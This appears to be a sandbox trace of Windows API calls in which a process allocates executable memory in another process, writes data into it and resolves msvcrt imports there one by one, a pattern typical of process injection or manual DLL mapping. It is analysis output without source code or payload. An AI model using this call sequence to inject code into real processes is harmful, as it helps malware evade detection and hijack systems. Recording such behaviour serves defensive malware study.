	[0155.118] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.118] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.118] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.118] ResetEvent (hEvent=0x488) returned 1
	[0155.118] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.119] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.119] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.119] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004084, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.119] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.119] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.119] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.119] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.120] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.120] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.120] ResetEvent (hEvent=0x488) returned 1
	[0155.120] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.120] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.120] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.121] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004088, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.121] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.121] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.121] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.121] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.121] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.122] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.122] ResetEvent (hEvent=0x488) returned 1
	[0155.122] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.122] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.122] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.122] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000408c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.123] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.123] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc37c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0155.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc37c, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=11 | out: lpWideCharStr="msvcrt.dll") returned 11
	[0155.123] lstrlenW (lpString="msvcrt.dll") returned 10
	[0155.123] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.123] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x16, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x16) returned 1
	[0155.124] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.124] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.124] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.124] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.124] ResetEvent (hEvent=0x488) returned 1
	[0155.124] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.125] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.125] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.125] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.125] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.125] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.125] lstrlenA (lpString="_except_handler4_common") returned 23
	[0155.125] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.125] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3dc*, nSize=0x18, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3dc*, lpNumberOfBytesWritten=0x128494*=0x18) returned 1
	[0155.126] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.126] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.126] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.126] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.127] ResetEvent (hEvent=0x488) returned 1
	[0155.127] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.127] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.128] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.128] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.128] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.128] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000409c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.128] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.128] lstrlenA (lpString="??2@YAPAXI@Z") returned 12
	[0155.128] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.129] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc35e*, nSize=0xd, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc35e*, lpNumberOfBytesWritten=0x128494*=0xd) returned 1
	[0155.129] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.129] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.129] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.129] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.130] ResetEvent (hEvent=0x488) returned 1
	[0155.130] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.130] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.130] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.130] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.130] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040a0, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.131] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.131] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.131] lstrlenA (lpString="_amsg_exit") returned 10
	[0155.131] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.131] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3ce*, nSize=0xb, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3ce*, lpNumberOfBytesWritten=0x128494*=0xb) returned 1
	[0155.131] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.132] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.132] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.132] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.132] ResetEvent (hEvent=0x488) returned 1
	[0155.132] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.133] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.133] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.133] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.133] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.133] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040a4, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.133] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.133] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.133] lstrlenA (lpString="_initterm") returned 9
	[0155.133] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.134] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3c2*, nSize=0xa, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3c2*, lpNumberOfBytesWritten=0x128494*=0xa) returned 1
	[0155.134] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.134] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.134] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.134] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.135] ResetEvent (hEvent=0x488) returned 1
	[0155.135] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.135] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.135] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.135] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.135] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040a8, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.136] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.136] lstrlenA (lpString="free") returned 4
	[0155.136] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.136] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3ba*, nSize=0x5, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3ba*, lpNumberOfBytesWritten=0x128494*=0x5) returned 1
	[0155.136] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.136] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.137] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.137] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.137] ResetEvent (hEvent=0x488) returned 1
	[0155.137] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.137] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.137] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.138] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.138] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040ac, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.138] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.138] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.138] lstrlenA (lpString="malloc") returned 6
	[0155.138] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.138] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3b0*, nSize=0x7, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3b0*, lpNumberOfBytesWritten=0x128494*=0x7) returned 1
	[0155.139] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.139] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.139] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.139] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.140] ResetEvent (hEvent=0x488) returned 1
	[0155.140] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.140] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.140] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.140] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.140] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040b0, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.141] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.141] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.141] lstrlenA (lpString="_XcptFilter") returned 11
	[0155.141] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.141] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc3a2*, nSize=0xc, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc3a2*, lpNumberOfBytesWritten=0x128494*=0xc) returned 1
	[0155.141] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.141] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.141] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.142] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.142] ResetEvent (hEvent=0x488) returned 1
	[0155.142] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.142] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.142] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.143] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.143] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040b4, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.143] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.143] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.143] lstrlenA (lpString="??1type_info@@UAE@XZ") returned 20
	[0155.143] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.143] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc38a*, nSize=0x15, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc38a*, lpNumberOfBytesWritten=0x128494*=0x15) returned 1
	[0155.144] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
